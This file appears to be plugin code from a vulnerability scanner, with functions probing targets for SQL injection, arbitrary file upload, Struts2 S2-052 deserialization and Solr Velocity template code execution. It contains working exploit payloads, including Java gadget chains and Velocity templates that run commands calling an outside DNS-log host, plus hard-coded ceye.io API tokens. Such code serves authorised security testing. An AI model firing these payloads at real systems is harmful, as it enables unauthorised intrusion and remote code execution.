def medusa(Url, RandomAgent, ProxyIp):
    """Run two SQL-injection probes against ``Url`` and return the findings as text.

    Probe 1 requests the module-level ``payload`` path and treats a body containing
    ``bbbmicrosoft`` as positive. Probe 2 requests the module-level ``payload2``
    path and treats a response that took 6 s or longer to complete as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing`` (scheme, host, optional port).
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        The concatenated finding strings (empty string when nothing matched), or
        ``None`` when probe 2 raises and control falls through the bare ``except``.

    Notes:
        ``payload`` and ``payload2`` are not defined in this block; they must exist
        at module level. Every request is sent with ``verify=False``, so TLS
        certificate validation is disabled for the target connection.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    # NOTE(review): ``resp`` is declared global so the assignment below leaks the
    # last Response into module scope; ``resp2`` is declared but never used here.
    global resp
    global resp2
    Medusas = []
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        elif ProxyIp == None:
            resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code  # read but not used by the check below
        if con.lower().find('bbbmicrosoft') != -1:
            Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            Medusas.append(str(Medusa))
    except Exception as e:
        # NOTE(review): every failure of probe 1 (including network errors and
        # timeouts) is silently discarded; nothing is logged.
        pass
    try:
        payload_url2 = scheme + "://" + url + payload2
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        start_time = time.time()  # wall-clock start for the timing-based check
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = requests.get(payload_url2, headers=headers, proxies=proxies, timeout=6, verify=False)
        elif ProxyIp == None:
            resp = requests.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # A completed response that took at least 6 s is recorded as a finding.
        if time.time() - start_time >= 6:
            Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url2)
            Medusas.append(str(Medusa))
        _t = VulnerabilityInfo(Medusas)
        web = ClassCongregation.VulnerabilityDetails(_t.info)
        web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
        Medusas_str = ''
        for i in Medusas:
            Medusas_str = Medusas_str + i
        return (str(Medusas_str))
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp):
    """Probe ``Url`` for an injection condition and for an exposed user page.

    Pass 1 iterates the module-level ``urls`` list, appending the module-level
    ``payload`` to each, and treats an HTTP 500 whose body contains
    ``gqxmicrosoft`` as positive. Pass 2 requests ``/include/get_user.aspx`` and
    treats a body containing ``button_normal`` as positive. The first positive
    result is reported and returned immediately.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        ``VulnerabilityInfo(...).info`` for the first positive probe, otherwise the
        ``info`` built from the (possibly empty) ``Medusas`` list.

    Notes:
        ``urls`` and ``payload`` are not defined in this block; they must exist at
        module level. All requests disable TLS verification (``verify=False``).
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    # NOTE(review): ``port`` is computed above but never used in the URLs built below.
    global resp
    global resp2  # declared but never assigned or read in this function
    Medusas = []
    try:
        for turl in urls:
            payload_url = scheme + "://" + url + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            if ProxyIp != None:
                proxies = {
                    # the proxy address must carry an http:// or https:// scheme prefix
                    "http": "http://" + str(ProxyIp)
                }
                resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp == None:
                resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 500 and con.lower().find('gqxmicrosoft') != -1:
                Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
                Medusas.append(str(Medusa))
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                return (_t.info)
    except:
        # NOTE(review): a single failing path aborts the whole ``urls`` loop.
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
    try:
        payload_url = scheme + "://" + url + "/include/get_user.aspx"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        elif ProxyIp == None:
            resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code  # read but not used by the check below
        if con.lower().find('button_normal') != -1:
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            Medusas.append(str(Medusa))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (_t.info)
    except:
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
    # Neither probe matched: return the info built from the empty list.
    _t = VulnerabilityInfo(Medusas)
    return (_t.info)
def medusa(Url, RandomAgent, ProxyIp):
    """Probe ``Url`` for an unrestricted file upload in the editor image handler.

    Posts a fixed multipart body (sent with a form-urlencoded ``Content-Type``)
    to ``/library/editornew/Editor/img_save.asp``, extracts a ``<digits>.cer``
    name from a ``getimg('...')`` fragment in the response, fetches that file
    from ``/library/editornew/Editor/NewImage/`` and treats HTTP 200 with the
    marker ``testvul`` in the body as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility but not used; the proxy
            branch was commented out, so every request goes direct.

    Returns:
        ``str(VulnerabilityInfo(...).info)`` on a positive result, otherwise ``None``.

    Notes:
        ``data`` is a static marker file, so a positive result leaves a
        ``testvul`` artifact on the target that is never cleaned up. All
        requests use ``verify=False``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    global resp
    global resp2  # both globals leak the Response objects into module scope
    try:
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # Static multipart body with boundary WebKitFormBoundaryNjZKAB66SVyL1INA.
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        # NOTE(review): ``ProxyIp`` is ignored; the proxy-aware branch that used
        # to live here was commented out in the original source.
        resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            if code2 == 200 and con2.lower().find("testvul") != -1:
                # con2 (the served file body) is embedded verbatim in the report.
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp):
    """Probe ``Url`` for the Struts2 (S2-052) XML deserialization condition.

    Posts an XML document to ``/orders/3/edit`` with ``Content-Type:
    application/xml`` and, after a fixed 5 s wait, queries a ceye.io DNS-log API
    for ``"<url>.S2052"``.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted but not used anywhere in this function.

    Returns:
        ``None``. A positive result is written via ``ClassCongregation.WriteFile``.

    Notes:
        The ceye.io query string carries a hard-coded API token; anyone with the
        source can read the account's DNS-log records. The target request uses
        ``verify=False``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    payload_url = scheme + "://" + url + ':' + str(port) + '/orders/3/edit'
    host = url + ':' + str(port)
    # The single ``{}`` below receives ``url`` so the DNS-log hostname identifies the target.
    payload = ''' <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>ping</string> <string>{}.S2052.7ktb2x.ceye.io</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> '''.format(url)
    headers = {
        'Host': host,
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/xml',
    }
    try:
        s = requests.session()
        resp = s.post(payload_url, data=payload, headers=headers, timeout=5, verify=False)
        # NOTE(review): hard-coded third-party API token committed in source —
        # treat it as leaked and load it from configuration instead.
        ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter='
        time.sleep(5)  # fixed wait before polling the DNS-log API
        ceye_content = requests.get(ceyeurl, timeout=3)  # a Response object, not its text
        flag = "{}.S2052".format(url)
        if flag in ceye_content:
            Medusa = "{}存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:Struts2_1_2-Struts2_3_33,Struts2_5-Struts2_5_12\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url, payload)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(**kwargs) -> None:
    """Probe a Solr instance for the VelocityResponseWriter template-injection condition.

    Reads ``Url``, ``Headers`` and ``Proxies`` from ``kwargs``, lists cores via
    ``/solr/admin/cores``, posts a config update that enables the ``velocity``
    response writer on the last core listed, then issues a ``select`` query whose
    template triggers a DNS lookup to a ``ClassCongregation.Dnslog`` host. A
    positive result is decided by ``DL.result()``.

    Args:
        **kwargs: ``Url`` (base URL without trailing slash), ``Headers``
            (dict of request headers), ``Proxies`` (requests proxy mapping).

    Returns:
        None. Findings are written through ``VulnerabilityDetails`` and ``WriteFile``.

    Notes:
        ``Headers1`` and ``Headers2`` alias the caller's ``Headers`` dict, so the
        ``Content-Type`` assignments mutate the caller's object. The config-update
        POST changes the target's Solr configuration and is not reverted.
    """
    url = kwargs.get("Url")  # fetch the passed-in url argument
    Headers = kwargs.get("Headers")  # fetch the passed-in headers
    proxies = kwargs.get("Proxies")  # fetch the passed-in proxy settings
    try:
        Headers1 = Headers  # same object as Headers, not a copy
        Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
        payload_url = url + '/solr/admin/cores'
        # NOTE(review): no verify=False here, unlike the later requests — TLS behaviour is inconsistent.
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=Headers1).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # ends up holding the last core name listed
            payload = "/solr/" + name + "/config"
            DL = ClassCongregation.Dnslog()
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(DL.dns_host())
            payload_url1 = url + payload
            payload_url2 = url + payload2
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            Headers2 = Headers  # also the same object; this overwrites Headers1's Content-Type too
            Headers2['Content-Type'] = 'application/json'
            resp = requests.post(payload_url1, data=payload_data, headers=Headers2, proxies=proxies, timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=Headers1, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            if DL.result():
                # Three format arguments but only two placeholders; the extra one is ignored.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(url, con2, DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, resp2, **kwargs).Write()  # pass the url and the scanned data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)  # write to the error log
def medusa(**kwargs) -> None:
    """Probe ``Url`` for an unrestricted file upload in the editor image handler.

    Uploads a multipart body containing a 20-character random marker ``RD`` to
    ``/library/editornew/Editor/img_save.asp``, extracts the stored ``<digits>.cer``
    name from a ``getimg('...')`` fragment, fetches it back from
    ``/library/editornew/Editor/NewImage/`` and treats HTTP 200 with the marker in
    the body as positive.

    Args:
        **kwargs: ``Url`` (base URL without trailing slash), ``Headers``
            (dict of request headers), ``Proxies`` (requests proxy mapping).

    Returns:
        None. Findings are written through ``VulnerabilityDetails`` and ``WriteFile``.

    Notes:
        ``Headers`` is mutated in place (``Content-Type`` and ``Accept``), which is
        visible to the caller. A positive result leaves the marker file on the
        target. All requests use ``verify=False``.
    """
    url = kwargs.get("Url")  # fetch the passed-in url argument
    Headers = kwargs.get("Headers")  # fetch the passed-in headers
    proxies = kwargs.get("Proxies")  # fetch the passed-in proxy settings
    try:
        RD = ClassCongregation.randoms().result(20)  # per-run marker searched for in the served file
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = url + payload
        # Multipart body with boundary WebKitFormBoundaryNjZKAB66SVyL1INA; the ``{}`` receives RD.
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD).encode('utf-8')
        # NOTE(review): these assignments mutate the caller's Headers dict.
        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            if code2 == 200 and con2.lower().find(RD) != -1:
                # con2 (the served file body) is embedded verbatim in the report.
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, resp2, **kwargs).Write()  # pass the url and the scanned data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)  # write to the error log
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe ``Url`` for the Phpweb front-end file-upload condition.

    Step 1 posts ``act=appcode`` to ``/base/post.php`` and extracts ``k`` from the
    response. Step 2 posts a multipart upload to ``/base/appfile.php`` carrying a
    10-character random marker and ``md5(k + "1")``. Step 3 fetches
    ``/effect/source/bg/<marker>.txt`` and treats HTTP 200 with the marker in the
    body as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy setting, normalised through ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails(...)``.

    Returns:
        None. Findings are written through ``VulnerabilityDetails`` and ``WriteFile``.

    Notes:
        A positive result leaves ``<marker>.txt`` on the target. All requests use
        ``verify=False``. If ``k=`` is absent from the step-1 response,
        ``re.match`` returns ``None`` and the ``.group`` call raises into the
        ``except`` below.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    try:
        payload1 = "/base/post.php"
        payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
        ran = ranstr(10)  # per-run marker, also used as the uploaded file name
        payload_url3 = scheme + '://' + url + ':' + str(port) + "/effect/source/bg/{}.txt".format(ran)
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        headers2 = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
        }
        resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=headers, timeout=5, verify=False)
        con = resp.text
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1)  # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        # Placeholders in order: file name (ran), file content (ran), field "m" (md5_en).
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=headers2, timeout=5, verify=False)  # response not inspected
        resp3 = requests.get(payload_url3, headers=headers, proxies=proxies, timeout=5, verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()  # pass the url and the scanned data
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp):
    """Probe ``Url`` for a SQL-injection condition in ``WorkflowCenterTreeData.jsp``.

    Posts a crafted ``formids`` form field to
    ``/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333`` and
    treats an HTTP 200 whose body contains the JSON keys ``"draggable":``,
    ``"checked":``, ``"id":`` and ``"text":`` as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        ``VulnerabilityInfo(...).info`` on a positive result, otherwise ``None``.

    Notes:
        ``port`` is computed but not used in the request URL. The request uses
        ``verify=False``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    global resp
    global resp2  # declared but never assigned or read in this function
    try:
        payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        payload_url = scheme + "://" + url + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        # The same ``formids`` value is built three times below (two request
        # branches plus the report string); only the proxy handling differs.
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url, data={'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1'}, headers=headers, timeout=6, proxies=proxies, verify=False)
        elif ProxyIp == None:
            resp = s.post(payload_url, data={'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1'}, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower().find('''"draggable":''') != -1 and con.lower().find('''"checked":''') != -1 and con.lower().find('''"id":''') != -1 and con.lower().find('''"text":''') != -1:
            Medusa = "{} 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1')
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (_t.info)
    except:
        # NOTE(review): bare except; the failure itself is not logged, only the URL and plugin parameter.
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe a Solr instance for the VelocityResponseWriter template-injection condition.

    Lists cores via ``/solr/admin/cores``, posts a config update that enables the
    ``velocity`` response writer on the last core listed, issues a ``select``
    query whose template triggers a DNS lookup containing a 10-character random
    marker, waits 5 s and polls a ceye.io DNS-log API for that marker.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        UnixTimestamp: forwarded to ``VulnerabilityDetails(...)``.

    Returns:
        None. Findings are written through ``VulnerabilityDetails`` and ``WriteFile``.

    Notes:
        The DNS-log URL embeds a hard-coded API token. The config-update POST
        changes the target's Solr configuration and is not reverted. Requests to
        the target use ``verify=False``; the first GET does not.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        step1 = requests.get(payload_url, timeout=6, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # ends up holding the last core name listed
            payload = "/solr/" + name + "/config"
            ran = ranstr(10)  # per-run marker looked up in the DNS-log records
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}.mdtx4t.ceye.io%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(ran)
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            resp = requests.post(payload_url1, data=payload_data, headers=headers1, timeout=6, verify=False)  # response not inspected
